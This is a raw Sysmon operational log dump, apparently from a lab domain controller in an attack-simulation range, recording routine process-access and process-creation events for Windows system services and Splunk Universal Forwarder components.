13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44D3-6000-2001-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D3-6000-2001-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.154{08A6967A-44D3-6000-2001-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D4-6000-2201-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-44D4-6000-2201-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D4-6000-2201-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:16.450{08A6967A-44D4-6000-2201-000000009A01}4456C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.934{08A6967A-44D5-6000-2301-000000009A01}22321312C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:17.794{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D5-6000-2301-000000009A01}2232C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 